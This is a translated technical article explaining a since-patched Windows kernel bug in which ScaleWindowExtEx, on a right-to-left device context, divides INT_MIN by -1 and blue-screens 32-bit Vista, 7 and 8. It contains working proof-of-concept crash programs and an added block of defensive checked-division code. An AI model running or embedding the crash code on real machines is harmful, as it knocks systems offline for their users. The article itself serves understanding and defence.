
How to drop Windows with six lines of code

See also: Microsoft fixed blue screen vulnerability

A friend once told me about a vulnerability in Windows: thanks to it, you can bring up the blue screen of death with just six lines of C code. The program needs no administrator rights and calls only one window-scaling function.




Some theory

When the processor cannot carry out an instruction, it raises an exception, and the OS decides what to do with it. If the exception comes from a bug in a program and nothing handles it, the system shows the familiar message that the program has stopped working.

For example, in this code the division by zero is such an invalid operation.
#include <stdio.h>

int main(void)
{
    volatile int zero = 0;   /* volatile keeps the compiler from folding the division away */
    int a = 2 / zero;        /* division by zero: the processor raises an exception here */
    printf("%d", a);
    return 0;
}


INT_MIN / -1

The second case is dividing INT_MIN by -1.
With a 32-bit int, INT_MIN = −2,147,483,648 = −2^31 and INT_MAX = 2,147,483,647 = 2^31 − 1. The mathematically correct result of INT_MIN / -1 is 2^31, which is one more than INT_MAX.
So the result of INT_MIN / -1 does not fit in an int, and the processor reports this with the same divide exception as for division by zero.

Accordingly, this program crashes in the same way:
#include <stdio.h>
#include <limits.h>

int main()
{
    int a = INT_MIN;
    int b = -1;
    int c = a / b;
    printf ("%d", c);
    return 0;
}


Windows

It turns out that Windows does not always guard against this case either.
There is a WinAPI function that divides its arguments without validating them first: ScaleWindowExtEx.
Its prototype:
BOOL ScaleWindowExtEx(
  _In_   HDC hdc,
  _In_   int Xnum,
  _In_   int Xdenom,
  _In_   int Ynum,
  _In_   int Ydenom,
  _Out_  LPSIZE lpSize
);



The function scales the window extents of a device context: the current extents are multiplied by the numerator and divided by the denominator. That is,
Xnum / Xdenom is the scaling factor along x,
Ynum / Ydenom is the scaling factor along y.
The function needs a device context (DC); a suitable one can be created with CreateCompatibleDC (NULL). The problem only shows up when the DC's layout has been switched to right-to-left with SetLayout.
So: create a DC with CreateCompatibleDC (NULL), set LAYOUT_RTL with SetLayout, and call ScaleWindowExtEx with INT_MIN as the X numerator and -1 as the X denominator.
Because the division is performed by the kernel rather than by the application, it is Windows that goes down, not the program.
Passing INT_MIN and -1 produces the overflow described above, and the result is a blue screen.
Link with gdi32.lib and build on Windows:
#include <windows.h>
#include <limits.h>

int main()
{
	HDC dc = CreateCompatibleDC (NULL);
	SetLayout (dc, LAYOUT_RTL);
	ScaleWindowExtEx (dc, INT_MIN, -1, 1, 1, NULL);
}

The same thing in six lines, without limits.h:
#include <windows.h>
int main() {
	HDC dc = CreateCompatibleDC (NULL);
	SetLayout (dc, LAYOUT_RTL);
	ScaleWindowExtEx (dc, -2147483647 - 1, -1, 1, 1, NULL);
}

INT_MIN is -2147483648, but in C that value cannot be written as a single literal: 2147483648 does not fit in an int, so -2147483648 gets a wider type. Writing -2147483647 - 1 gives INT_MIN as an int without including limits.h, which is what the six-line version does.
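The check that this bug calls for, as an added example rather than code from the article or from Windows: a 32-bit division routine that refuses the two operand pairs that trap, plus a hypothetical extent-scaling helper using the ScaleWindowExtEx formula (new = old * num / denom) that rejects them instead of faulting.

```c
#include <limits.h>
#include <stdio.h>

/* Returns 1 if num / denom would make the processor raise its
 * divide-error exception: a zero divisor, or INT_MIN / -1, whose
 * mathematical result 2^31 does not fit in a 32-bit int. */
int div_would_trap(int num, int denom)
{
    return denom == 0 || (num == INT_MIN && denom == -1);
}

/* Signed 32-bit division that never traps: returns fallback instead. */
int checked_div(int num, int denom, int fallback)
{
    if (div_would_trap(num, denom))
        return fallback;
    return num / denom;
}

/* Window-extent scaling in the style of ScaleWindowExtEx
 * (new = old * num / denom). The product is formed in 64 bits so it
 * cannot overflow, the divisor is checked before dividing, and a
 * quotient outside the int range is rejected rather than truncated.
 * Hypothetical helper, not the Windows implementation. */
int scale_extent(int old, int num, int denom, int fallback)
{
    long long product, quotient;
    if (denom == 0)
        return fallback;
    product = (long long)old * num;   /* |product| <= 2^62, fits in 64 bits */
    quotient = product / denom;       /* cannot trap: |product| < 2^63 */
    if (quotient > INT_MAX || quotient < INT_MIN)
        return fallback;
    return (int)quotient;
}

int main(void)
{
    /* Constructed operand pairs, including the two from the article. */
    printf("2 / 0 traps: %d\n", div_would_trap(2, 0));
    printf("INT_MIN / -1 traps: %d\n", div_would_trap(INT_MIN, -1));
    printf("INT_MIN / 1 = %d\n", checked_div(INT_MIN, 1, 0));
    printf("scale 100 by 3/2 = %d\n", scale_extent(100, 3, 2, 0));
    printf("scale 1 by INT_MIN/-1 rejected: %d\n",
           scale_extent(1, INT_MIN, -1, 0) == 0);
    return 0;
}
```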

It works on Windows Vista, 7 and 8, but only on 32-bit systems; on 64-bit systems there is no crash (the division there is 64-bit).

UPDATE1: the constant can be written as ((int) 0x80000000) or as (-2147483647 - 1); thanks to AndreyDmitriev and alper.
UPDATE2: Microsoft has fixed the vulnerability.
UPDATE3: a detailed analysis of the bug, "The Other Integer Overflow": blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html.

Source: https://habr.com/ru/post/179543/
